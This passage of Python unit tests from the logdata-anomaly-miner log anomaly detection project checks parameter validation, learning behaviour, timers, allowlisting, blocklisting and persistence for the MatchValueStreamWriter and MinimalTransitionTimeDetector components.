b"-") match_context = MatchContext(b"25537\x80 ") other_sme = DummySequenceModelElement("sequence", [fdme_number, fdme_euro_char, fdme_sp]) match_element = other_sme.get_match_element("match", match_context) other_log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, mvsw) mvsw.receive_atom(other_log_atom) self.assertEqual(self.output_stream.getvalue(), "25537;; \n") self.reset_output_stream() # test with non-ascii characters def test2validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, MatchValueStreamWriter, None, ["path"], b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, 123, ["path"], b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, 123.3, ["path"], b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, "", ["path"], b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, b"", ["path"], b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, True, ["path"], b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, {"id": "Default"}, ["path"], b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, ["Default"], ["path"], b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, (), ["path"], b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, set(), ["path"], b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), None, b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), 123, b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), 123.3, b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), "path", b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), b"path", b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), True, b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), {"id": "Default"}, b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), (), b";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), set(), b";", b"-") self.assertRaises(ValueError, MatchValueStreamWriter, StringIO(), ["path"], b"", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], ";", b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], None, b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], 123, b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], 123.2, b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], True, b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], {"id": "Default"}, b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], (), b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], [b";"], b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], set(b";"), b"-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", "-") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", None) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", 123) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", 123.3) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", True) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", {"id": "Default"}) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", ()) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", [b"-"]) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", set(b";")) self.assertRaises(ValueError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list="") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=b"Default") self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=True) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=123) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=123.22) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=()) self.assertRaises(TypeError, MatchValueStreamWriter, StringIO(), ["path"], b";", b"-", log_resource_ignore_list=set()) MatchValueStreamWriter(StringIO(), ["path"], b";", b"-", log_resource_ignore_list=["file:///tmp/syslog"]) MatchValueStreamWriter(StringIO(), ["path"], b";", b"") MatchValueStreamWriter(StringIO(), ["path"], b";", b"-") MatchValueStreamWriter(BytesIO(), ["path"], b";", b"-") with FileIO("/dev/null") as f: MatchValueStreamWriter(f, ["path"], b";", b"-") MatchValueStreamWriter(BufferedWriter(StringIO()), ["path"], b";", b"-") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/MinimalTransitionTimeDetectorTest.py000066400000000000000000001212361500476301700327740ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.MinimalTransitionTimeDetector import MinimalTransitionTimeDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class MinimalTransitionTimeDetectorTest(TestBase): """Unittests for the MinimalTransitionTimeDetector.""" def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ # Initialize detector for sequence length 2 t = time.time() expected_string = '%s First Appearance: %s\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" m1 = MatchElement("/model/id", b"1", b"1", None) m2 = MatchElement("/model/value", b"a", b"a", None) log_atom1 = LogAtom(b"1a", ParserMatch(MatchElement("/model", b"1a", b"1a", [m1, m2])), t+1, None) m4 = MatchElement("/model/value", b"b", b"b", None) log_atom2 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m4])), t+2, None) m5 = MatchElement("/model/id", b"2", b"2", None) m6 = MatchElement("/model/value", b"a", b"a", None) log_atom3 = LogAtom(b"2a", ParserMatch(MatchElement("/model", b"2a", b"2a", [m5, m6])), t+3, None) m7 = MatchElement("/model/id", b"1", b"1", None) m8 = MatchElement("/model/value", b"c", b"c", None) log_atom4 = LogAtom(b"1c", ParserMatch(MatchElement("/model", b"1c", b"1c", [m7, m8])), t+4, None) m9 = MatchElement("/model/id", b"2", b"2", None) m10 = MatchElement("/model/value", b"b", b"b", None) log_atom5 = LogAtom(b"2b", ParserMatch(MatchElement("/model", b"2b", b"2b", [m9, m10])), t+5, None) m11 = MatchElement("/model/value", b"c", b"c", None) log_atom6 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m11])), t+6, None) mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=["/model/id"], num_log_lines_solidify_matrix=5, learn_mode=True, output_logline=False) mttd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") time_matrix = {} self.assertEqual(mttd.time_matrix, time_matrix) mttd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(mttd.time_matrix, time_matrix) mttd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(mttd.time_matrix, time_matrix) mttd.receive_atom(log_atom4) time_matrix[(m8.match_string.decode(),)] = {(m2.match_string.decode(),): log_atom4.atom_time - log_atom1.atom_time} self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), f"['{m2.match_string.decode()}'] - ['{m8.match_string.decode()}'] (['{m7.match_string.decode()}']), {log_atom4.atom_time - log_atom1.atom_time}", mttd.__class__.__name__, 1, "1c")) self.reset_output_stream() self.assertEqual(mttd.time_matrix, time_matrix) mttd.receive_atom(log_atom5) time_matrix[(m10.match_string.decode(),)] = {(m6.match_string.decode(),): log_atom5.atom_time - log_atom3.atom_time} self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 5).strftime(dtf), f"['{m6.match_string.decode()}'] - ['{m10.match_string.decode()}'] (['{m9.match_string.decode()}']), {log_atom5.atom_time - log_atom3.atom_time}", mttd.__class__.__name__, 1, "2b")) self.reset_output_stream() self.assertEqual(mttd.time_matrix, time_matrix) mttd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(mttd.time_matrix, time_matrix) # allow_missing_id=True mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=["/model/id"], num_log_lines_solidify_matrix=5, learn_mode=True, output_logline=False, allow_missing_id=True) mttd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") time_matrix = {} self.assertEqual(mttd.time_matrix, time_matrix) mttd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(mttd.time_matrix, time_matrix) mttd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(mttd.time_matrix, time_matrix) mttd.receive_atom(log_atom4) time_matrix[(m8.match_string.decode(),)] = {(m2.match_string.decode(),): log_atom4.atom_time - log_atom1.atom_time} self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), f"['{m2.match_string.decode()}'] - ['{m8.match_string.decode()}'] (['{m7.match_string.decode()}']), {log_atom4.atom_time - log_atom1.atom_time}", mttd.__class__.__name__, 1, "1c")) self.reset_output_stream() self.assertEqual(mttd.time_matrix, time_matrix) mttd.receive_atom(log_atom5) time_matrix[(m10.match_string.decode(),)] = {(m6.match_string.decode(),): log_atom5.atom_time - log_atom3.atom_time} self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 5).strftime(dtf), f"['{m6.match_string.decode()}'] - ['{m10.match_string.decode()}'] (['{m9.match_string.decode()}']), {log_atom5.atom_time - log_atom3.atom_time}", mttd.__class__.__name__, 1, "2b")) self.reset_output_stream() self.assertEqual(mttd.time_matrix, time_matrix) mttd.receive_atom(log_atom6) time_matrix[(m11.match_string.decode(),)][(m4.match_string.decode(),)] = log_atom6.atom_time - log_atom2.atom_time self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), f"['{m4.match_string.decode()}'] - ['{m11.match_string.decode()}'] (['']), {log_atom6.atom_time - log_atom2.atom_time}", mttd.__class__.__name__, 1, "1b")) self.reset_output_stream() self.assertEqual(mttd.time_matrix, time_matrix) # stop_learning_time mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=["/model/id"], num_log_lines_solidify_matrix=5, learn_mode=True, allow_missing_id=True, stop_learning_time=100) self.assertTrue(mttd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(mttd.receive_atom(log_atom1)) self.assertTrue(mttd.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(mttd.receive_atom(log_atom1)) self.assertFalse(mttd.learn_mode) # stop_learning_no_anomaly_time mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=["/model/id"], num_log_lines_solidify_matrix=5, learn_mode=True, allow_missing_id=True, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(mttd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(mttd.receive_atom(log_atom1)) self.assertTrue(mttd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(mttd.receive_atom(log_atom2)) self.assertTrue(mttd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(mttd.receive_atom(log_atom3)) self.assertTrue(mttd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(mttd.receive_atom(log_atom1)) self.assertFalse(mttd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"]) t = time.time() mttd.next_persist_time = t + 400 self.assertEqual(mttd.do_timer(t + 200), 200) self.assertEqual(mttd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(mttd.do_timer(t + 999), 1) self.assertEqual(mttd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"]) analysis = "Analysis.%s" self.assertRaises(Exception, mttd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The MinimalTransitionTimeDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, mttd.allowlist_event, analysis % mttd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(mttd.allowlist_event(analysis % mttd.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % mttd.__class__.__name__)) self.assertEqual(mttd.constraint_list, ["/s1"]) mttd.learn_mode = False self.assertEqual(mttd.allowlist_event(analysis % mttd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % mttd.__class__.__name__)) self.assertEqual(mttd.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. esd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"]) analysis = "Analysis.%s" self.assertRaises(Exception, esd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The MinimalTransitionTimeDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, esd.blocklist_event, analysis % esd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(esd.blocklist_event(analysis % esd.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % esd.__class__.__name__)) self.assertEqual(esd.ignore_list, ["/s1"]) esd.learn_mode = False self.assertEqual(esd.blocklist_event(analysis % esd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % ("/d1", analysis % esd.__class__.__name__)) self.assertEqual(esd.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() m1 = MatchElement("/model/id", b"1", b"1", None) m2 = MatchElement("/model/value", b"a", b"a", None) log_atom1 = LogAtom(b"1a", ParserMatch(MatchElement("/model", b"1a", b"1a", [m1, m2])), t+1, None) m4 = MatchElement("/model/value", b"b", b"b", None) log_atom2 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m4])), t+2, None) m5 = MatchElement("/model/id", b"2", b"2", None) m6 = MatchElement("/model/value", b"a", b"a", None) log_atom3 = LogAtom(b"2a", ParserMatch(MatchElement("/model", b"2a", b"2a", [m5, m6])), t+3, None) m7 = MatchElement("/model/id", b"1", b"1", None) m8 = MatchElement("/model/value", b"c", b"c", None) log_atom4 = LogAtom(b"1c", ParserMatch(MatchElement("/model", b"1c", b"1c", [m7, m8])), t+4, None) m9 = MatchElement("/model/id", b"2", b"2", None) m10 = MatchElement("/model/value", b"b", b"b", None) log_atom5 = LogAtom(b"2b", ParserMatch(MatchElement("/model", b"2b", b"2b", [m9, m10])), t+5, None) m11 = MatchElement("/model/value", b"c", b"c", None) log_atom6 = LogAtom(b"1b", ParserMatch(MatchElement("/model", b"1b", b"1b", [m11])), t+6, None) mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=["/model/id"], num_log_lines_solidify_matrix=5, learn_mode=True, output_logline=False) mttd.receive_atom(log_atom1) mttd.receive_atom(log_atom2) mttd.receive_atom(log_atom3) mttd.receive_atom(log_atom4) mttd.receive_atom(log_atom5) mttd.receive_atom(log_atom6) mttd.do_persist() with open(mttd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[[3.0], [2.0]], [["string:c"], ["string:b"]], [[["string:a"]], [["string:a"]]]]') self.assertEqual(mttd.time_matrix, {("c",): {("a",): 3.0}, ("b",): {("a",): 2.0}}) mttd.sequences = {} mttd.load_persistence_data() self.assertEqual(mttd.time_matrix, {('c',): {('a',): 3.0}, ('b',): {('a',): 2.0}}) other = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=["/model/id"], target_path_list=["/model/value"], num_log_lines_solidify_matrix=5, learn_mode=True) self.assertEqual(other.time_matrix, mttd.time_matrix) def test6add_to_persistence_event(self): mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"]) mttd.add_to_persistence_event("Analysis.MinimalTransitionTimeDetector", [["a"], ["1"], 3.0]) self.assertEqual(mttd.time_matrix, {("a",): {("1",): 3.0}}) def test7remove_from_persistence_event(self): mttd = MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"]) mttd.time_matrix = {("a",): {("1",): 3.0}} mttd.remove_from_persistence_event("Analysis.MinimalTransitionTimeDetector", [["a"], ["1"]]) self.assertEqual(mttd.time_matrix, {}) def test8validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, ["default"], ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, None, ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, "", ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, b"Default", ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, True, ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, 123, ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, 123.3, ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, {"id": "Default"}, ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, (), ["/model/value"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, set(), ["/model/value"]) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], [""]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], [None]) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["default"]) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=[""]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list="") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=123.3) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=[]) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], id_path_list=None) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=[""]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list="") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=123.3) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=[]) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=None) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=[""]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list="") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=True) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=123.3) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=[]) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], constraint_list=None) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=b"True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id="True") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=123) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=123.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_id=True) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=-1) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=0) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=100.22) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix="123") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], num_log_lines_solidify_matrix=100) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=-1) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold="123") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=["Default"]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=[]) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=()) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=set()) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=0) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=100) MinimalTransitionTimeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], time_output_threshold=100.22) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=-1) self.assertRaises(ValueError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=1.1) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=b"Default") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold="123") self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold={"id": "Default"}) self.assertRaises(TypeError, MinimalTransitionTimeDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], anomaly_threshold=["Default"]) self.assertRaises(TypeError, 